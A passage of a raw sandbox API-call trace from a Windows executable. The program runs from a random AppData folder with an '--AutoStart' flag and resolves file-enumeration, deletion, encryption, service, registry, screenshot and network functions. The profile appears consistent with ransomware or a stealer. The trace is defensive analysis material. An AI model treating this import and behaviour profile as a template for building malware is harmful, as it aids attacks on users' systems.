lpProcName="CreateMutexA") returned 0x759f4c6b [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="FindNextFileW") returned 0x759f54ee [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a1735f [0197.130] GetProcAddress (hModule=0x759e0000, lpProcName="SetEnvironmentVariableA") returned 0x759fe331 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="DeleteFileW") returned 0x759f89b3 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="LocalFree") returned 0x759f2d3c [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcpyW") returned 0x75a13102 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="DeleteFileA") returned 0x759f5444 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="lstrcpyA") returned 0x75a12a9d [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="SetPriorityClass") returned 0x75a0cf28 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentProcess") returned 0x759f1809 [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="GetComputerNameW") returned 0x759fdd0e [0197.131] GetProcAddress (hModule=0x759e0000, lpProcName="GetLogicalDrives") returned 0x759f5371 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleFileNameW") returned 0x759f4950 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="SetStdHandle") returned 0x75a7454f [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="GetVersion") returned 0x759f4467 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="CreateDirectoryA") returned 0x75a1d526 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="CreateThread") returned 0x759f34d5 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="CompareStringW") returned 0x759f3bca [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="GetTimeFormatW") returned 0x75a0f481 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="GetDateFormatW") returned 0x75a134d7 [0197.132] GetProcAddress (hModule=0x759e0000, lpProcName="EnumSystemLocalesW") returned 0x75a7425f [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="GetUserDefaultLCID") returned 0x759f3da5 [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="IsValidLocale") returned 0x75a0ce46 [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="GetLocaleInfoW") returned 0x759f3c42 [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="CreateSemaphoreW") returned 0x75a0ca5a [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleHandleW") returned 0x759f34b0 [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="GetTickCount") returned 0x759f110c [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="TlsFree") returned 0x759f3587 [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="TlsSetValue") returned 0x759f14fb [0197.133] GetProcAddress (hModule=0x759e0000, lpProcName="TlsGetValue") returned 0x759f11e0 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="TlsAlloc") returned 0x759f49ad [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x759f1916 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="SetUnhandledExceptionFilter") returned 0x759f87c9 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="UnhandledExceptionFilter") returned 0x75a1772f [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleHandleA") returned 0x759f1245 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="GetVersionExA") returned 0x759f3519 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="GlobalMemoryStatus") returned 0x759f8b6d [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="LoadLibraryA") returned 0x759f49d7 [0197.134] GetProcAddress (hModule=0x759e0000, lpProcName="FlushConsoleInputBuffer") returned 0x75a97a9f [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="WaitForSingleObject") returned 0x759f1136 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="CreateDirectoryW") returned 0x759f4259 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="SetFilePointerEx") returned 0x75a0c807 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="CreateProcessW") returned 0x759f103d [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="FreeLibrary") returned 0x759f34c8 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="SetErrorMode") returned 0x759f1b00 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="lstrlenA") returned 0x759f5a4b [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="SetFilePointer") returned 0x759f17d1 [0197.135] GetProcAddress (hModule=0x759e0000, lpProcName="FindFirstFileW") returned 0x759f4435 [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="SetConsoleMode") returned 0x75a0a77d [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="CreateFileA") returned 0x759f53c6 [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="GetCommandLineW") returned 0x759f5223 [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x75a9793f [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="PeekConsoleInputA") returned 0x75a96f0d [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="FreeEnvironmentStringsW") returned 0x759f51cb [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="GetEnvironmentStringsW") returned 0x759f51e3 [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentProcessId") returned 0x759f11f8 [0197.136] GetProcAddress (hModule=0x759e0000, lpProcName="QueryPerformanceCounter") returned 0x759f1725 [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="GetTimeZoneInformation") returned 0x759f465a [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="RaiseException") returned 0x759f58a6 [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="GetStringTypeW") returned 0x759f1946 [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="GetConsoleCP") returned 0x75a97bff [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="ReadConsoleW") returned 0x75a9739a [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="GetConsoleMode") returned 0x759f1328 [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="HeapSize") returned 0x77333002 [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="LoadLibraryExW") returned 0x759f495d [0197.137] GetProcAddress (hModule=0x759e0000, lpProcName="OutputDebugStringW") returned 0x75a1d1d4 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="SetConsoleCtrlHandler") returned 0x759f8a09 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="RtlUnwind") returned 0x75a1d1c3 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="FatalAppExitA") returned 0x75a74691 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="GetStartupInfoW") returned 0x759f4d40 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="GetExitCodeProcess") returned 0x75a0174d [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="LCMapStringW") returned 0x759f17b9 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="DeleteCriticalSection") returned 0x773345f5 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="AreFileApisANSI") returned 0x75a740d1 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="ExitProcess") returned 0x759f7a10 [0197.138] GetProcAddress (hModule=0x759e0000, lpProcName="GetProcessHeap") returned 0x759f14e9 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="HeapReAlloc") returned 0x77341f6e [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="GlobalFree") returned 0x759f5558 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="SetEndOfFile") returned 0x75a0ce2e [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="ReadConsoleInputA") returned 0x75a96f53 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="CloseHandle") returned 0x759f1410 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="HeapFree") returned 0x759f14c9 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="HeapAlloc") returned 0x7732e026 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="EnterCriticalSection") returned 0x773222b0 [0197.139] GetProcAddress (hModule=0x759e0000, lpProcName="LeaveCriticalSection") returned 0x77322270 [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="GetStdHandle") returned 0x759f51b3 [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="GetFileType") returned 0x759f3531 [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="GetModuleHandleExW") returned 0x759f4a6f [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="WriteConsoleW") returned 0x75a17aca [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="EncodePointer") returned 0x77340fcb [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="DecodePointer") returned 0x77339d35 [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="GetSystemTimeAsFileTime") returned 0x759f3509 [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="IsDebuggerPresent") returned 0x759f4a5d [0197.140] GetProcAddress (hModule=0x759e0000, lpProcName="IsProcessorFeaturePresent") returned 0x759f5235 [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="IsValidCodePage") returned 0x759f4493 [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="GetACP") returned 0x759f179c [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="GetOEMCP") returned 0x75a1d1a1 [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="GetCPInfo") returned 0x759f5189 [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentThread") returned 0x759f17ec [0197.141] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentThreadId") returned 0x759f1450 [0197.141] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76e00000 [0197.141] GetProcAddress (hModule=0x76e00000, lpProcName="PeekMessageW") returned 0x76e205ba [0197.141] GetProcAddress (hModule=0x76e00000, lpProcName="PostThreadMessageW") returned 0x76e18bff [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="DefWindowProcW") returned 0x773325dd [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="DispatchMessageW") returned 0x76e1787b [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="UpdateWindow") returned 0x76e23559 [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="CreateWindowExW") returned 0x76e18a29 [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="LoadCursorW") returned 0x76e188f7 [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="IsWindow") returned 0x76e17136 [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="ShowWindow") returned 0x76e20dfb [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="RegisterClassExW") returned 0x76e1b17d [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="PostQuitMessage") returned 0x76e19abb [0197.142] GetProcAddress (hModule=0x76e00000, lpProcName="GetMessageW") returned 0x76e178e2 [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="DestroyWindow") returned 0x76e19a55 [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="SendMessageW") returned 0x76e19679 [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="GetProcessWindowStation") returned 0x76e19eea [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="GetUserObjectInformationW") returned 0x76e18068 [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="MessageBoxA") returned 0x76e6fd1e [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="GetDesktopWindow") returned 0x76e20a19 [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="MessageBoxW") returned 0x76e6fd3f [0197.143] GetProcAddress (hModule=0x76e00000, lpProcName="TranslateMessage") returned 0x76e17809 [0197.143] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75af0000 [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="RegCloseKey") returned 0x75b0469d [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="CloseServiceHandle") returned 0x75b0369c [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="GetUserNameW") returned 0x75b0157a [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="ReportEventA") returned 0x75af3ee9 [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="RegisterEventSourceA") returned 0x75b02d46 [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="DeregisterEventSource") returned 0x75b035dd [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="CryptHashData") returned 0x75afdf36 [0197.144] GetProcAddress (hModule=0x75af0000, lpProcName="RegSetValueExW") returned 0x75b014d6 [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="CryptDestroyHash") returned 0x75afdf66 [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="ControlService") returned 0x75b17144 [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="RegOpenKeyExW") returned 0x75b0468d [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="CryptCreateHash") returned 0x75afdf4e [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="CryptEncrypt") returned 0x75b1779b [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="CryptImportKey") returned 0x75afc532 [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="QueryServiceStatus") returned 0x75b02a86 [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="RegQueryValueExW") returned 0x75b046ad [0197.145] GetProcAddress (hModule=0x75af0000, lpProcName="CryptReleaseContext") returned 0x75afe124 [0197.146] GetProcAddress (hModule=0x75af0000, lpProcName="OpenServiceW") returned 0x75afca4c [0197.146] GetProcAddress (hModule=0x75af0000, lpProcName="OpenSCManagerW") returned 0x75afca64 [0197.146] GetProcAddress (hModule=0x75af0000, lpProcName="CryptAcquireContextW") returned 0x75afdf14 [0197.146] GetProcAddress (hModule=0x75af0000, lpProcName="CryptGetHashParam") returned 0x75afdf7e [0197.146] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x761b0000 [0197.150] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetPathFromIDListW") returned 0x762417bf [0197.151] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetSpecialFolderLocation") returned 0x7623e141 [0197.151] GetProcAddress (hModule=0x761b0000, lpProcName="ShellExecuteA") returned 0x763f7078 [0197.151] GetProcAddress (hModule=0x761b0000, lpProcName="ShellExecuteExW") returned 0x761d1e46 [0197.151] GetProcAddress (hModule=0x761b0000, lpProcName="CommandLineToArgvW") returned 0x761c9ee8 [0197.151] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathA") returned 0x762c7804 [0197.151] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75840000 [0197.152] GetProcAddress (hModule=0x75840000, lpProcName="CoInitialize") returned 0x7585b636 [0197.152] GetProcAddress (hModule=0x75840000, lpProcName="CoInitializeSecurity") returned 0x75867259 [0197.152] GetProcAddress (hModule=0x75840000, lpProcName="CoUninitialize") returned 0x758886d3 [0197.152] GetProcAddress (hModule=0x75840000, lpProcName="CoCreateInstance") returned 0x75889d0b [0197.152] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75510000 [0197.152] GetProcAddress (hModule=0x75510000, lpProcName=0x6) returned 0x75513e59 [0197.152] GetProcAddress (hModule=0x75510000, lpProcName=0x8) returned 0x75513ed5 [0197.152] GetProcAddress (hModule=0x75510000, lpProcName=0x9) returned 0x75513eae [0197.153] GetProcAddress (hModule=0x75510000, lpProcName=0xc8) returned 0x75513f21 [0197.153] GetProcAddress (hModule=0x75510000, lpProcName=0xca) returned 0x7551fd6b [0197.153] GetProcAddress (hModule=0x75510000, lpProcName=0xc9) returned 0x75514af8 [0197.153] GetProcAddress (hModule=0x75510000, lpProcName=0xc) returned 0x75515dee [0197.153] GetProcAddress (hModule=0x75510000, lpProcName=0x2) returned 0x75514642 [0197.153] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74c20000 [0198.089] GetProcAddress (hModule=0x74c20000, lpProcName="GetAdaptersInfo") returned 0x74c29263 [0198.089] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75ba0000 [0198.123] GetProcAddress (hModule=0x75ba0000, lpProcName=0xc) returned 0x75bab131 [0198.123] GetProcAddress (hModule=0x75ba0000, lpProcName=0xb) returned 0x75ba311b [0198.123] GetProcAddress (hModule=0x75ba0000, lpProcName=0x34) returned 0x75bb7673 [0198.123] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74bc0000 [0198.661] GetProcAddress (hModule=0x74bc0000, lpProcName="DnsFree") returned 0x74bc436b [0198.661] GetProcAddress (hModule=0x74bc0000, lpProcName="DnsQuery_W") returned 0x74bd572c [0198.661] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75270000 [0198.661] GetProcAddress (hModule=0x75270000, lpProcName="CryptStringToBinaryA") returned 0x752a5d77 [0198.661] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75390000 [0198.661] GetProcAddress (hModule=0x75390000, lpProcName="DeleteObject") returned 0x753a5689 [0198.661] GetProcAddress (hModule=0x75390000, lpProcName="GetObjectA") returned 0x753a85d4 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="SelectObject") returned 0x753a4f70 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="GetDeviceCaps") returned 0x753a4de0 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="GetBitmapBits") returned 0x753ac155 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="BitBlt") returned 0x753a5ea6 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="DeleteDC") returned 0x753a58b3 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="CreateDCA") returned 0x753a7bcc [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="CreateCompatibleDC") returned 0x753a54f4 [0198.662] GetProcAddress (hModule=0x75390000, lpProcName="CreateCompatibleBitmap") returned 0x753a5f49 [0198.662] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74b00000 [0199.165] GetProcAddress (hModule=0x74b00000, lpProcName="atexit") returned 0x74b1c544 [0199.165] atexit (param_1=0x1de0920) returned 0 [0199.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ebc8 | out: lpSystemTimeAsFileTime=0x18ebc8*(dwLowDateTime=0x29200a80, dwHighDateTime=0x1d5ff3c)) [0199.177] GetCurrentThreadId () returned 0x5e4 [0199.177] GetCurrentProcessId () returned 0x5e0 [0199.177] QueryPerformanceCounter (in: lpPerformanceCount=0x18ebc0 | out: lpPerformanceCount=0x18ebc0*=9518061288) returned 1 [0199.253] GetStartupInfoW (in: lpStartupInfo=0x18eb58 | out: lpStartupInfo=0x18eb58*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x759f3519, hStdOutput=0x7731fd35, hStdError=0x77387daf)) [0199.273] GetProcessHeap () returned 0x750000 [0199.473] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x759e0000 [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="FlsAlloc") returned 0x759f4f2b [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="FlsFree") returned 0x759f359f [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="FlsGetValue") returned 0x759f1252 [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="FlsSetValue") returned 0x759f4208 [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="InitializeCriticalSectionEx") returned 0x759f4d28 [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="CreateEventExW") returned 0x75a7410b [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="CreateSemaphoreExW") returned 0x75a74195 [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="SetThreadStackGuarantee") returned 0x759fd31f [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="CreateThreadpoolTimer") returned 0x75a0ee7e [0199.474] GetProcAddress (hModule=0x759e0000, lpProcName="SetThreadpoolTimer") returned 0x7734441c [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7736c50e [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="CloseThreadpoolTimer") returned 0x7736c381 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="CreateThreadpoolWait") returned 0x75a0f088 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="SetThreadpoolWait") returned 0x773505d7 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="CloseThreadpoolWait") returned 0x7736ca24 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="FlushProcessWriteBuffers") returned 0x77320b8c [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773dfde8 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentProcessorNumber") returned 0x77371e1d [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="GetLogicalProcessorInformation") returned 0x75a74761 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="CreateSymbolicLinkW") returned 0x75a6cd11 [0199.475] GetProcAddress (hModule=0x759e0000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="EnumSystemLocalesEx") returned 0x75a7424f [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="CompareStringEx") returned 0x75a746b1 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetDateFormatEx") returned 0x75a86676 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetLocaleInfoEx") returned 0x75a74751 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetTimeFormatEx") returned 0x75a865f1 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetUserDefaultLocaleName") returned 0x75a747c1 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="IsValidLocaleName") returned 0x75a747e1 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="LCMapStringEx") returned 0x75a747f1 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetCurrentPackageId") returned 0x0 [0199.476] GetProcAddress (hModule=0x759e0000, lpProcName="GetTickCount64") returned 0x75a0eee0 [0199.477] GetProcAddress (hModule=0x759e0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0199.477] GetProcAddress (hModule=0x759e0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0199.477] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3bc) returned 0x76f598 [0199.477] GetCurrentThreadId () returned 0x5e4 [0199.485] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x762428 [0199.486] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x800) returned 0x76f960 [0199.486] GetStartupInfoW (in: lpStartupInfo=0x18eb28 | out: lpStartupInfo=0x18eb28*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x1fa7e30e, hStdError=0x58)) [0199.486] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0199.486] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0199.486] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0199.486] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe\" --AutoStart" [0199.486] GetEnvironmentStringsW () returned 0x770168* [0199.486] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xb02) returned 0x770c78 [0199.528] FreeEnvironmentStringsW (penv=0x770168) returned 1 [0199.534] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1a3e.tmp.exe.exe")) returned 0x61 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xe8) returned 0x771788 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x9c) returned 0x771878 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x765988 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6c) returned 0x771920 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6e) returned 0x771998 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x78) returned 0x762ca8 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x62) returned 0x771a10 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76b280 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766e30 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x28) returned 0x76aca8 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1a) returned 0x76f350 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4a) returned 0x771a80 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x72) returned 0x762d28 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76b2b8 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76b2f0 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1c) returned 0x76f378 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xd2) returned 0x771ad8 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x7c) returned 0x771bb8 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x771c40 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3a) returned 0x7659d0 [0199.534] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x90) returned 0x771c80 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76acd8 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76b328 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x771d18 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766e80 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x771d58 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x765a18 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x82) returned 0x771db8 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x76b360 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x28) returned 0x76ad08 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x76f3a0 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2c) returned 0x76b398 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x771e48 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x771ea8 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2a) returned 0x76b3d0 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x765a60 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x771f08 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x76ad38 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x76b408 [0199.535] RtlAllocateHeap (HeapHandle=0x750000, 